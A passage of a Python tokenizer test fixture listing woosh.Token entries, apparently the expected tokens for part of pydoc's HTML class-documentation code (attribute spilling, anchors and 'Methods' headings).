woosh.Token(woosh.NAME, 'mod', 910, 51, 910, 54),
woosh.Token(woosh.OP, ')', 910, 54, 910, 55),
woosh.Token(woosh.OP, ')', 910, 55, 910, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 910, 56, 911, 0),
woosh.Token(woosh.DEDENT, ' ', 911, 0, 911, 12),
woosh.Token(woosh.DEDENT, '', 911, 12, 911, 12),
woosh.Token(woosh.NAME, 'return', 911, 12, 911, 18),
woosh.Token(woosh.NAME, 'attrs', 911, 19, 911, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 911, 24, 912, 0),
woosh.Token(woosh.DEDENT, ' ', 913, 0, 913, 8),
woosh.Token(woosh.NAME, 'def', 913, 8, 913, 11),
woosh.Token(woosh.NAME, 'spilldata', 913, 12, 913, 21),
woosh.Token(woosh.OP, '(', 913, 21, 913, 22),
woosh.Token(woosh.NAME, 'msg', 913, 22, 913, 25),
woosh.Token(woosh.OP, ',', 913, 25, 913, 26),
woosh.Token(woosh.NAME, 'attrs', 913, 27, 913, 32),
woosh.Token(woosh.OP, ',', 913, 32, 913, 33),
woosh.Token(woosh.NAME, 'predicate', 913, 34, 913, 43),
woosh.Token(woosh.OP, ')', 913, 43, 913, 44),
woosh.Token(woosh.OP, ':', 913, 44, 913, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 913, 45, 914, 0),
woosh.Token(woosh.INDENT, ' ', 914, 0, 914, 12),
woosh.Token(woosh.NAME, 'ok', 914, 12, 914, 14),
woosh.Token(woosh.OP, ',', 914, 14, 914, 15),
woosh.Token(woosh.NAME, 'attrs', 914, 16, 914, 21),
woosh.Token(woosh.OP, '=', 914, 22, 914, 23),
woosh.Token(woosh.NAME, '_split_list', 914, 24, 914, 35),
woosh.Token(woosh.OP, '(', 914, 35, 914, 36),
woosh.Token(woosh.NAME, 'attrs', 914, 36, 914, 41),
woosh.Token(woosh.OP, ',', 914, 41, 914, 42),
woosh.Token(woosh.NAME, 'predicate', 914, 43, 914, 52),
woosh.Token(woosh.OP, ')', 914, 52, 914, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 914, 53, 915, 0),
woosh.Token(woosh.NAME, 'if', 915, 12, 915, 14),
woosh.Token(woosh.NAME, 'ok', 915, 15, 915, 17),
woosh.Token(woosh.OP, ':', 915, 17, 915, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 915, 18, 916, 0),
woosh.Token(woosh.INDENT, ' ', 916, 0, 916, 16),
woosh.Token(woosh.NAME, 'hr', 916, 16, 916, 18),
woosh.Token(woosh.OP, '.', 916, 18, 916, 19),
woosh.Token(woosh.NAME, 'maybe', 916, 19, 916, 24),
woosh.Token(woosh.OP, '(', 916, 24, 916, 25),
woosh.Token(woosh.OP, ')', 916, 25, 916, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 916, 26, 917, 0),
woosh.Token(woosh.NAME, 'push', 917, 16, 917, 20),
woosh.Token(woosh.OP, '(', 917, 20, 917, 21),
woosh.Token(woosh.NAME, 'msg', 917, 21, 917, 24),
woosh.Token(woosh.OP, ')', 917, 24, 917, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 917, 25, 918, 0),
woosh.Token(woosh.NAME, 'for', 918, 16, 918, 19),
woosh.Token(woosh.NAME, 'name', 918, 20, 918, 24),
woosh.Token(woosh.OP, ',', 918, 24, 918, 25),
woosh.Token(woosh.NAME, 'kind', 918, 26, 918, 30),
woosh.Token(woosh.OP, ',', 918, 30, 918, 31),
woosh.Token(woosh.NAME, 'homecls', 918, 32, 918, 39),
woosh.Token(woosh.OP, ',', 918, 39, 918, 40),
woosh.Token(woosh.NAME, 'value', 918, 41, 918, 46),
woosh.Token(woosh.NAME, 'in', 918, 47, 918, 49),
woosh.Token(woosh.NAME, 'ok', 918, 50, 918, 52),
woosh.Token(woosh.OP, ':', 918, 52, 918, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 918, 53, 919, 0),
woosh.Token(woosh.INDENT, ' ', 919, 0, 919, 20),
woosh.Token(woosh.NAME, 'base', 919, 20, 919, 24),
woosh.Token(woosh.OP, '=', 919, 25, 919, 26),
woosh.Token(woosh.NAME, 'self', 919, 27, 919, 31),
woosh.Token(woosh.OP, '.', 919, 31, 919, 32),
woosh.Token(woosh.NAME, 'docother', 919, 32, 919, 40),
woosh.Token(woosh.OP, '(', 919, 40, 919, 41),
woosh.Token(woosh.NAME, 'getattr', 919, 41, 919, 48),
woosh.Token(woosh.OP, '(', 919, 48, 919, 49),
woosh.Token(woosh.NAME, 'object', 919, 49, 919, 55),
woosh.Token(woosh.OP, ',', 919, 55, 919, 56),
woosh.Token(woosh.NAME, 'name', 919, 57, 919, 61),
woosh.Token(woosh.OP, ')', 919, 61, 919, 62),
woosh.Token(woosh.OP, ',', 919, 62, 919, 63),
woosh.Token(woosh.NAME, 'name', 919, 64, 919, 68),
woosh.Token(woosh.OP, ',', 919, 68, 919, 69),
woosh.Token(woosh.NAME, 'mod', 919, 70, 919, 73),
woosh.Token(woosh.OP, ')', 919, 73, 919, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 919, 74, 920, 0),
woosh.Token(woosh.NAME, 'doc', 920, 20, 920, 23),
woosh.Token(woosh.OP, '=', 920, 24, 920, 25),
woosh.Token(woosh.NAME, 'getdoc', 920, 26, 920, 32),
woosh.Token(woosh.OP, '(', 920, 32, 920, 33),
woosh.Token(woosh.NAME, 'value', 920, 33, 920, 38),
woosh.Token(woosh.OP, ')', 920, 38, 920, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 920, 39, 921, 0),
woosh.Token(woosh.NAME, 'if', 921, 20, 921, 22),
woosh.Token(woosh.NAME, 'not', 921, 23, 921, 26),
woosh.Token(woosh.NAME, 'doc', 921, 27, 921, 30),
woosh.Token(woosh.OP, ':', 921, 30, 921, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 921, 31, 922, 0),
woosh.Token(woosh.INDENT, ' ', 922, 0, 922, 24),
woosh.Token(woosh.NAME, 'push', 922, 24, 922, 28),
woosh.Token(woosh.OP, '(', 922, 28, 922, 29),
woosh.Token(woosh.STRING, "'<dl><dt>%s</dl>\\n'", 922, 29, 922, 48),
woosh.Token(woosh.OP, '%', 922, 49, 922, 50),
woosh.Token(woosh.NAME, 'base', 922, 51, 922, 55),
woosh.Token(woosh.OP, ')', 922, 55, 922, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 922, 56, 923, 0),
woosh.Token(woosh.DEDENT, ' ', 923, 0, 923, 20),
woosh.Token(woosh.NAME, 'else', 923, 20, 923, 24),
woosh.Token(woosh.OP, ':', 923, 24, 923, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 923, 25, 924, 0),
woosh.Token(woosh.INDENT, ' ', 924, 0, 924, 24),
woosh.Token(woosh.NAME, 'doc', 924, 24, 924, 27),
woosh.Token(woosh.OP, '=', 924, 28, 924, 29),
woosh.Token(woosh.NAME, 'self', 924, 30, 924, 34),
woosh.Token(woosh.OP, '.', 924, 34, 924, 35),
woosh.Token(woosh.NAME, 'markup', 924, 35, 924, 41),
woosh.Token(woosh.OP, '(', 924, 41, 924, 42),
woosh.Token(woosh.NAME, 'getdoc', 924, 42, 924, 48),
woosh.Token(woosh.OP, '(', 924, 48, 924, 49),
woosh.Token(woosh.NAME, 'value', 924, 49, 924, 54),
woosh.Token(woosh.OP, ')', 924, 54, 924, 55),
woosh.Token(woosh.OP, ',', 924, 55, 924, 56),
woosh.Token(woosh.NAME, 'self', 924, 57, 924, 61),
woosh.Token(woosh.OP, '.', 924, 61, 924, 62),
woosh.Token(woosh.NAME, 'preformat', 924, 62, 924, 71),
woosh.Token(woosh.OP, ',', 924, 71, 924, 72),
woosh.Token(woosh.NAME, 'funcs', 925, 42, 925, 47),
woosh.Token(woosh.OP, ',', 925, 47, 925, 48),
woosh.Token(woosh.NAME, 'classes', 925, 49, 925, 56),
woosh.Token(woosh.OP, ',', 925, 56, 925, 57),
woosh.Token(woosh.NAME, 'mdict', 925, 58, 925, 63),
woosh.Token(woosh.OP, ')', 925, 63, 925, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 925, 64, 926, 0),
woosh.Token(woosh.NAME, 'doc', 926, 24, 926, 27),
woosh.Token(woosh.OP, '=', 926, 28, 926, 29),
woosh.Token(woosh.STRING, "'<dd><tt>%s</tt>'", 926, 30, 926, 47),
woosh.Token(woosh.OP, '%', 926, 48, 926, 49),
woosh.Token(woosh.NAME, 'doc', 926, 50, 926, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 926, 53, 927, 0),
woosh.Token(woosh.NAME, 'push', 927, 24, 927, 28),
woosh.Token(woosh.OP, '(', 927, 28, 927, 29),
woosh.Token(woosh.STRING, "'<dl><dt>%s%s</dl>\\n'", 927, 29, 927, 50),
woosh.Token(woosh.OP, '%', 927, 51, 927, 52),
woosh.Token(woosh.OP, '(', 927, 53, 927, 54),
woosh.Token(woosh.NAME, 'base', 927, 54, 927, 58),
woosh.Token(woosh.OP, ',', 927, 58, 927, 59),
woosh.Token(woosh.NAME, 'doc', 927, 60, 927, 63),
woosh.Token(woosh.OP, ')', 927, 63, 927, 64),
woosh.Token(woosh.OP, ')', 927, 64, 927, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 927, 65, 928, 0),
woosh.Token(woosh.DEDENT, ' ', 928, 0, 928, 20),
woosh.Token(woosh.NAME, 'push', 928, 20, 928, 24),
woosh.Token(woosh.OP, '(', 928, 24, 928, 25),
woosh.Token(woosh.STRING, "'\\n'", 928, 25, 928, 29),
woosh.Token(woosh.OP, ')', 928, 29, 928, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 928, 30, 929, 0),
woosh.Token(woosh.DEDENT, ' ', 929, 0, 929, 12),
woosh.Token(woosh.DEDENT, '', 929, 12, 929, 12),
woosh.Token(woosh.NAME, 'return', 929, 12, 929, 18),
woosh.Token(woosh.NAME, 'attrs', 929, 19, 929, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 929, 24, 930, 0),
woosh.Token(woosh.DEDENT, ' ', 931, 0, 931, 8),
woosh.Token(woosh.NAME, 'attrs', 931, 8, 931, 13),
woosh.Token(woosh.OP, '=', 931, 14, 931, 15),
woosh.Token(woosh.OP, '[', 931, 16, 931, 17),
woosh.Token(woosh.OP, '(', 931, 17, 931, 18),
woosh.Token(woosh.NAME, 'name', 931, 18, 931, 22),
woosh.Token(woosh.OP, ',', 931, 22, 931, 23),
woosh.Token(woosh.NAME, 'kind', 931, 24, 931, 28),
woosh.Token(woosh.OP, ',', 931, 28, 931, 29),
woosh.Token(woosh.NAME, 'cls', 931, 30, 931, 33),
woosh.Token(woosh.OP, ',', 931, 33, 931, 34),
woosh.Token(woosh.NAME, 'value', 931, 35, 931, 40),
woosh.Token(woosh.OP, ')', 931, 40, 931, 41),
woosh.Token(woosh.NAME, 'for', 932, 17, 932, 20),
woosh.Token(woosh.NAME, 'name', 932, 21, 932, 25),
woosh.Token(woosh.OP, ',', 932, 25, 932, 26),
woosh.Token(woosh.NAME, 'kind', 932, 27, 932, 31),
woosh.Token(woosh.OP, ',', 932, 31, 932, 32),
woosh.Token(woosh.NAME, 'cls', 932, 33, 932, 36),
woosh.Token(woosh.OP, ',', 932, 36, 932, 37),
woosh.Token(woosh.NAME, 'value', 932, 38, 932, 43),
woosh.Token(woosh.NAME, 'in', 932, 44, 932, 46),
woosh.Token(woosh.NAME, 'classify_class_attrs', 932, 47, 932, 67),
woosh.Token(woosh.OP, '(', 932, 67, 932, 68),
woosh.Token(woosh.NAME, 'object', 932, 68, 932, 74),
woosh.Token(woosh.OP, ')', 932, 74, 932, 75),
woosh.Token(woosh.NAME, 'if', 933, 17, 933, 19),
woosh.Token(woosh.NAME, 'visiblename', 933, 20, 933, 31),
woosh.Token(woosh.OP, '(', 933, 31, 933, 32),
woosh.Token(woosh.NAME, 'name', 933, 32, 933, 36),
woosh.Token(woosh.OP, ',', 933, 36, 933, 37),
woosh.Token(woosh.NAME, 'obj', 933, 38, 933, 41),
woosh.Token(woosh.OP, '=', 933, 41, 933, 42),
woosh.Token(woosh.NAME, 'object', 933, 42, 933, 48),
woosh.Token(woosh.OP, ')', 933, 48, 933, 49),
woosh.Token(woosh.OP, ']', 933, 49, 933, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 933, 50, 934, 0),
woosh.Token(woosh.NAME, 'mdict', 935, 8, 935, 13),
woosh.Token(woosh.OP, '=', 935, 14, 935, 15),
woosh.Token(woosh.OP, '{', 935, 16, 935, 17),
woosh.Token(woosh.OP, '}', 935, 17, 935, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 935, 18, 936, 0),
woosh.Token(woosh.NAME, 'for', 936, 8, 936, 11),
woosh.Token(woosh.NAME, 'key', 936, 12, 936, 15),
woosh.Token(woosh.OP, ',', 936, 15, 936, 16),
woosh.Token(woosh.NAME, 'kind', 936, 17, 936, 21),
woosh.Token(woosh.OP, ',', 936, 21, 936, 22),
woosh.Token(woosh.NAME, 'homecls', 936, 23, 936, 30),
woosh.Token(woosh.OP, ',', 936, 30, 936, 31),
woosh.Token(woosh.NAME, 'value', 936, 32, 936, 37),
woosh.Token(woosh.NAME, 'in', 936, 38, 936, 40),
woosh.Token(woosh.NAME, 'attrs', 936, 41, 936, 46),
woosh.Token(woosh.OP, ':', 936, 46, 936, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 936, 47, 937, 0),
woosh.Token(woosh.INDENT, ' ', 937, 0, 937, 12),
woosh.Token(woosh.NAME, 'mdict', 937, 12, 937, 17),
woosh.Token(woosh.OP, '[', 937, 17, 937, 18),
woosh.Token(woosh.NAME, 'key', 937, 18, 937, 21),
woosh.Token(woosh.OP, ']', 937, 21, 937, 22),
woosh.Token(woosh.OP, '=', 937, 23, 937, 24),
woosh.Token(woosh.NAME, 'anchor', 937, 25, 937, 31),
woosh.Token(woosh.OP, '=', 937, 32, 937, 33),
woosh.Token(woosh.STRING, "'#'", 937, 34, 937, 37),
woosh.Token(woosh.OP, '+', 937, 38, 937, 39),
woosh.Token(woosh.NAME, 'name', 937, 40, 937, 44),
woosh.Token(woosh.OP, '+', 937, 45, 937, 46),
woosh.Token(woosh.STRING, "'-'", 937, 47, 937, 50),
woosh.Token(woosh.OP, '+', 937, 51, 937, 52),
woosh.Token(woosh.NAME, 'key', 937, 53, 937, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 937, 56, 938, 0),
woosh.Token(woosh.NAME, 'try', 938, 12, 938, 15),
woosh.Token(woosh.OP, ':', 938, 15, 938, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 938, 16, 939, 0),
woosh.Token(woosh.INDENT, ' ', 939, 0, 939, 16),
woosh.Token(woosh.NAME, 'value', 939, 16, 939, 21),
woosh.Token(woosh.OP, '=', 939, 22, 939, 23),
woosh.Token(woosh.NAME, 'getattr', 939, 24, 939, 31),
woosh.Token(woosh.OP, '(', 939, 31, 939, 32),
woosh.Token(woosh.NAME, 'object', 939, 32, 939, 38),
woosh.Token(woosh.OP, ',', 939, 38, 939, 39),
woosh.Token(woosh.NAME, 'name', 939, 40, 939, 44),
woosh.Token(woosh.OP, ')', 939, 44, 939, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 939, 45, 940, 0),
woosh.Token(woosh.DEDENT, ' ', 940, 0, 940, 12),
woosh.Token(woosh.NAME, 'except', 940, 12, 940, 18),
woosh.Token(woosh.NAME, 'Exception', 940, 19, 940, 28),
woosh.Token(woosh.OP, ':', 940, 28, 940, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 940, 29, 941, 0),
woosh.Token(woosh.COMMENT, '# Some descriptors may meet a failure in their __get__.', 941, 16, 941, 71),
woosh.Token(woosh.COMMENT, '# (bug #1785)', 942, 16, 942, 29),
woosh.Token(woosh.INDENT, ' ', 943, 0, 943, 16),
woosh.Token(woosh.NAME, 'pass', 943, 16, 943, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 943, 20, 944, 0),
woosh.Token(woosh.DEDENT, ' ', 944, 0, 944, 12),
woosh.Token(woosh.NAME, 'try', 944, 12, 944, 15),
woosh.Token(woosh.OP, ':', 944, 15, 944, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 944, 16, 945, 0),
woosh.Token(woosh.COMMENT, '# The value may not be hashable (e.g., a data attr with', 945, 16, 945, 71),
woosh.Token(woosh.COMMENT, '# a dict or list value).', 946, 16, 946, 40),
woosh.Token(woosh.INDENT, ' ', 947, 0, 947, 16),
woosh.Token(woosh.NAME, 'mdict', 947, 16, 947, 21),
woosh.Token(woosh.OP, '[', 947, 21, 947, 22),
woosh.Token(woosh.NAME, 'value', 947, 22, 947, 27),
woosh.Token(woosh.OP, ']', 947, 27, 947, 28),
woosh.Token(woosh.OP, '=', 947, 29, 947, 30),
woosh.Token(woosh.NAME, 'anchor', 947, 31, 947, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 947, 37, 948, 0),
woosh.Token(woosh.DEDENT, ' ', 948, 0, 948, 12),
woosh.Token(woosh.NAME, 'except', 948, 12, 948, 18),
woosh.Token(woosh.NAME, 'TypeError', 948, 19, 948, 28),
woosh.Token(woosh.OP, ':', 948, 28, 948, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 948, 29, 949, 0),
woosh.Token(woosh.INDENT, ' ', 949, 0, 949, 16),
woosh.Token(woosh.NAME, 'pass', 949, 16, 949, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 949, 20, 950, 0),
woosh.Token(woosh.DEDENT, ' ', 951, 0, 951, 8),
woosh.Token(woosh.DEDENT, '', 951, 8, 951, 8),
woosh.Token(woosh.NAME, 'while', 951, 8, 951, 13),
woosh.Token(woosh.NAME, 'attrs', 951, 14, 951, 19),
woosh.Token(woosh.OP, ':', 951, 19, 951, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 951, 20, 952, 0),
woosh.Token(woosh.INDENT, ' ', 952, 0, 952, 12),
woosh.Token(woosh.NAME, 'if', 952, 12, 952, 14),
woosh.Token(woosh.NAME, 'mro', 952, 15, 952, 18),
woosh.Token(woosh.OP, ':', 952, 18, 952, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 952, 19, 953, 0),
woosh.Token(woosh.INDENT, ' ', 953, 0, 953, 16),
woosh.Token(woosh.NAME, 'thisclass', 953, 16, 953, 25),
woosh.Token(woosh.OP, '=', 953, 26, 953, 27),
woosh.Token(woosh.NAME, 'mro', 953, 28, 953, 31),
woosh.Token(woosh.OP, '.', 953, 31, 953, 32),
woosh.Token(woosh.NAME, 'popleft', 953, 32, 953, 39),
woosh.Token(woosh.OP, '(', 953, 39, 953, 40),
woosh.Token(woosh.OP, ')', 953, 40, 953, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 953, 41, 954, 0),
woosh.Token(woosh.DEDENT, ' ', 954, 0, 954, 12),
woosh.Token(woosh.NAME, 'else', 954, 12, 954, 16),
woosh.Token(woosh.OP, ':', 954, 16, 954, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 954, 17, 955, 0),
woosh.Token(woosh.INDENT, ' ', 955, 0, 955, 16),
woosh.Token(woosh.NAME, 'thisclass', 955, 16, 955, 25),
woosh.Token(woosh.OP, '=', 955, 26, 955, 27),
woosh.Token(woosh.NAME, 'attrs', 955, 28, 955, 33),
woosh.Token(woosh.OP, '[', 955, 33, 955, 34),
woosh.Token(woosh.NUMBER, '0', 955, 34, 955, 35),
woosh.Token(woosh.OP, ']', 955, 35, 955, 36),
woosh.Token(woosh.OP, '[', 955, 36, 955, 37),
woosh.Token(woosh.NUMBER, '2', 955, 37, 955, 38),
woosh.Token(woosh.OP, ']', 955, 38, 955, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 955, 39, 956, 0),
woosh.Token(woosh.DEDENT, ' ', 956, 0, 956, 12),
woosh.Token(woosh.NAME, 'attrs', 956, 12, 956, 17),
woosh.Token(woosh.OP, ',', 956, 17, 956, 18),
woosh.Token(woosh.NAME, 'inherited', 956, 19, 956, 28),
woosh.Token(woosh.OP, '=', 956, 29, 956, 30),
woosh.Token(woosh.NAME, '_split_list', 956, 31, 956, 42),
woosh.Token(woosh.OP, '(', 956, 42, 956, 43),
woosh.Token(woosh.NAME, 'attrs', 956, 43, 956, 48),
woosh.Token(woosh.OP, ',', 956, 48, 956, 49),
woosh.Token(woosh.NAME, 'lambda', 956, 50, 956, 56),
woosh.Token(woosh.NAME, 't', 956, 57, 956, 58),
woosh.Token(woosh.OP, ':', 956, 58, 956, 59),
woosh.Token(woosh.NAME, 't', 956, 60, 956, 61),
woosh.Token(woosh.OP, '[', 956, 61, 956, 62),
woosh.Token(woosh.NUMBER, '2', 956, 62, 956, 63),
woosh.Token(woosh.OP, ']', 956, 63, 956, 64),
woosh.Token(woosh.NAME, 'is', 956, 65, 956, 67),
woosh.Token(woosh.NAME, 'thisclass', 956, 68, 956, 77),
woosh.Token(woosh.OP, ')', 956, 77, 956, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 956, 78, 957, 0),
woosh.Token(woosh.NAME, 'if', 958, 12, 958, 14),
woosh.Token(woosh.NAME, 'object', 958, 15, 958, 21),
woosh.Token(woosh.NAME, 'is', 958, 22, 958, 24),
woosh.Token(woosh.NAME, 'not', 958, 25, 958, 28),
woosh.Token(woosh.NAME, 'builtins', 958, 29, 958, 37),
woosh.Token(woosh.OP, '.', 958, 37, 958, 38),
woosh.Token(woosh.NAME, 'object', 958, 38, 958, 44),
woosh.Token(woosh.NAME, 'and', 958, 45, 958, 48),
woosh.Token(woosh.NAME, 'thisclass', 958, 49, 958, 58),
woosh.Token(woosh.NAME, 'is', 958, 59, 958, 61),
woosh.Token(woosh.NAME, 'builtins', 958, 62, 958, 70),
woosh.Token(woosh.OP, '.', 958, 70, 958, 71),
woosh.Token(woosh.NAME, 'object', 958, 71, 958, 77),
woosh.Token(woosh.OP, ':', 958, 77, 958, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 958, 78, 959, 0),
woosh.Token(woosh.INDENT, ' ', 959, 0, 959, 16),
woosh.Token(woosh.NAME, 'attrs', 959, 16, 959, 21),
woosh.Token(woosh.OP, '=', 959, 22, 959, 23),
woosh.Token(woosh.NAME, 'inherited', 959, 24, 959, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 959, 33, 960, 0),
woosh.Token(woosh.NAME, 'continue', 960, 16, 960, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 960, 24, 961, 0),
woosh.Token(woosh.DEDENT, ' ', 961, 0, 961, 12),
woosh.Token(woosh.NAME, 'elif', 961, 12, 961, 16),
woosh.Token(woosh.NAME, 'thisclass', 961, 17, 961, 26),
woosh.Token(woosh.NAME, 'is', 961, 27, 961, 29),
woosh.Token(woosh.NAME, 'object', 961, 30, 961, 36),
woosh.Token(woosh.OP, ':', 961, 36, 961, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 961, 37, 962, 0),
woosh.Token(woosh.INDENT, ' ', 962, 0, 962, 16),
woosh.Token(woosh.NAME, 'tag', 962, 16, 962, 19),
woosh.Token(woosh.OP, '=', 962, 20, 962, 21),
woosh.Token(woosh.STRING, "'defined here'", 962, 22, 962, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 962, 36, 963, 0),
woosh.Token(woosh.DEDENT, ' ', 963, 0, 963, 12),
woosh.Token(woosh.NAME, 'else', 963, 12, 963, 16),
woosh.Token(woosh.OP, ':', 963, 16, 963, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 963, 17, 964, 0),
woosh.Token(woosh.INDENT, ' ', 964, 0, 964, 16),
woosh.Token(woosh.NAME, 'tag', 964, 16, 964, 19),
woosh.Token(woosh.OP, '=', 964, 20, 964, 21),
woosh.Token(woosh.STRING, "'inherited from %s'", 964, 22, 964, 41),
woosh.Token(woosh.OP, '%', 964, 42, 964, 43),
woosh.Token(woosh.NAME, 'self', 964, 44, 964, 48),
woosh.Token(woosh.OP, '.', 964, 48, 964, 49),
woosh.Token(woosh.NAME, 'classlink', 964, 49, 964, 58),
woosh.Token(woosh.OP, '(', 964, 58, 964, 59),
woosh.Token(woosh.NAME, 'thisclass', 964, 59, 964, 68),
woosh.Token(woosh.OP, ',', 964, 68, 964, 69),
woosh.Token(woosh.NAME, 'object', 965, 59, 965, 65),
woosh.Token(woosh.OP, '.', 965, 65, 965, 66),
woosh.Token(woosh.NAME, '__module__', 965, 66, 965, 76),
woosh.Token(woosh.OP, ')', 965, 76, 965, 77),
woosh.Token(woosh.NEWLINE, '\r\n', 965, 77, 966, 0),
woosh.Token(woosh.DEDENT, ' ', 966, 0, 966, 12),
woosh.Token(woosh.NAME, 'tag', 966, 12, 966, 15),
woosh.Token(woosh.OP, '+=', 966, 16, 966, 18),
woosh.Token(woosh.STRING, "':<br>\\n'", 966, 19, 966, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 966, 28, 967, 0),
woosh.Token(woosh.NAME, 'sort_attributes', 968, 12, 968, 27),
woosh.Token(woosh.OP, '(', 968, 27, 968, 28),
woosh.Token(woosh.NAME, 'attrs', 968, 28, 968, 33),
woosh.Token(woosh.OP, ',', 968, 33, 968, 34),
woosh.Token(woosh.NAME, 'object', 968, 35, 968, 41),
woosh.Token(woosh.OP, ')', 968, 41, 968, 42),
woosh.Token(woosh.NEWLINE, '\r\n', 968, 42, 969, 0),
woosh.Token(woosh.COMMENT, '# Pump out the attrs, segregated by kind.', 970, 12, 970, 53),
woosh.Token(woosh.NAME, 'attrs', 971, 12, 971, 17),
woosh.Token(woosh.OP, '=', 971, 18, 971, 19),
woosh.Token(woosh.NAME, 'spill', 971, 20, 971, 25),
woosh.Token(woosh.OP, '(', 971, 25, 971, 26),
woosh.Token(woosh.STRING, "'Methods %s'", 971, 26, 971, 38),
woosh.Token(woosh.OP, '%', 971, 39, 971, 40),
woosh.Token(woosh.NAME, 'tag', 971, 41, 971, 44),
woosh.Token(woosh.OP, ',', 971, 44, 971, 45),
woosh.Token(woosh.NAME, 'attrs', 971, 46, 971, 51),
woosh.Token(woosh.OP, ',', 971, 51, 971, 52),
woosh.Token(woosh.NAME, 'lambda', 972, 26, 972, 32),
woosh.Token(woosh.NAME, 't', 972, 33, 972, 34),
woosh.Token(woosh.OP, ':', 972, 34, 972, 35),
woosh.Token(woosh.NAME, 't', 972, 36, 972, 37),
woosh.Token(woosh.OP, '[', 972, 37, 972, 38),
woosh.Token(woosh.NUMBER, '1', 972, 38, 972, 39),
woosh.Token(woosh.OP, ']', 972, 39, 972, 40),
woosh.Token(woosh.OP, '==', 972, 41, 972, 43),
woosh.Token(woosh.STRING, "'method'", 972, 44, 972, 52),
woosh.Token(woosh.OP, ')', 972, 52, 972, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 972, 53, 973, 0),
woosh.Token(woosh.NAME, 'attrs', 973, 12, 973, 17),
woosh.Token(woosh.OP, '=', 973, 18, 973, 19),
woosh.Token(woosh.NAME, 'spill', 973, 20, 973, 25),
woosh.Token(woosh.OP, '(', 973, 25, 973, 26),
woosh.Token(woosh.STRING, "'Class methods %s'", 973, 26, 973, 44),
woosh.Token(woosh.OP, '%', 973, 45, 973, 46),
woosh.Token(woosh.NAME, 'tag', 973, 47, 973, 50),
woosh.Token(woosh.OP, ',', 973, 50, 973, 51),
woosh.Token(woosh.NAME, 'attrs', 973, 52, 973, 57),
woosh.Token(woosh.OP, ',', 973, 57, 973, 58),
woosh.Token(woosh.NAME, 'lambda', 974, 26, 974, 32),
woosh.Token(woosh.NAME, 't', 974, 33, 974, 34),
woosh.Token(woosh.OP, ':', 974, 34, 974, 35),
woosh.Token(woosh.NAME, 't', 974, 36, 974, 37),
woosh.Token(woosh.OP, '[', 974, 37, 974, 38),
woosh.Token(woosh.NUMBER, '1', 974, 38, 974, 39),
woosh.Token(woosh.OP, ']', 974, 39, 974, 40),
woosh.Token(woosh.OP, '==', 974, 41, 974, 43),
woosh.Token(woosh.STRING, "'class method'", 974, 44, 974, 58),
woosh.Token(woosh.OP, ')', 974, 58, 974, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 974, 59, 975, 0),
woosh.Token(woosh.NAME, 'attrs', 975, 12, 975, 17),
woosh.Token(woosh.OP, '=', 975, 18, 975, 19),
woosh.Token(woosh.NAME, 'spill', 975, 20, 975, 25),
woosh.Token(woosh.OP, '(', 975, 25, 975, 26),
woosh.Token(woosh.STRING, "'Static methods %s'", 975, 26, 975, 45),
woosh.Token(woosh.OP, '%', 975, 46, 975, 47),
woosh.Token(woosh.NAME, 'tag', 975, 48, 975, 51),
woosh.Token(woosh.OP, ',', 975, 51, 975, 52),
woosh.Token(woosh.NAME, 'attrs', 975, 53, 975, 58),
woosh.Token(woosh.OP, ',', 975, 58, 975, 59),
woosh.Token(woosh.NAME, 'lambda', 976, 26, 976, 32),
woosh.Token(woosh.NAME, 't', 976, 33, 976, 34),
woosh.Token(woosh.OP, ':', 976, 34, 976, 35),
woosh.Token(woosh.NAME, 't', 976, 36, 976, 37),
woosh.Token(woosh.OP, '[', 976, 37, 976, 38),
woosh.Token(woosh.NUMBER, '1', 976, 38, 976, 39),
woosh.Token(woosh.OP, ']', 976, 39, 976, 40),
woosh.Token(woosh.OP, '==', 976, 41, 976, 43),
woosh.Token(woosh.STRING, "'static method'", 976, 44, 976, 59),
woosh.Token(woosh.OP, ')', 976, 59, 976, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 976, 60, 977, 0),
woosh.Token(woosh.NAME, 'attrs', 977, 12, 977, 17),
woosh.Token(woosh.OP, '=', 977, 18, 977, 19),
woosh.Token(woosh.NAME, 'spilldescriptors', 977, 20, 977, 36),
woosh.Token(woosh.OP, '(', 977, 36, 977, 37),
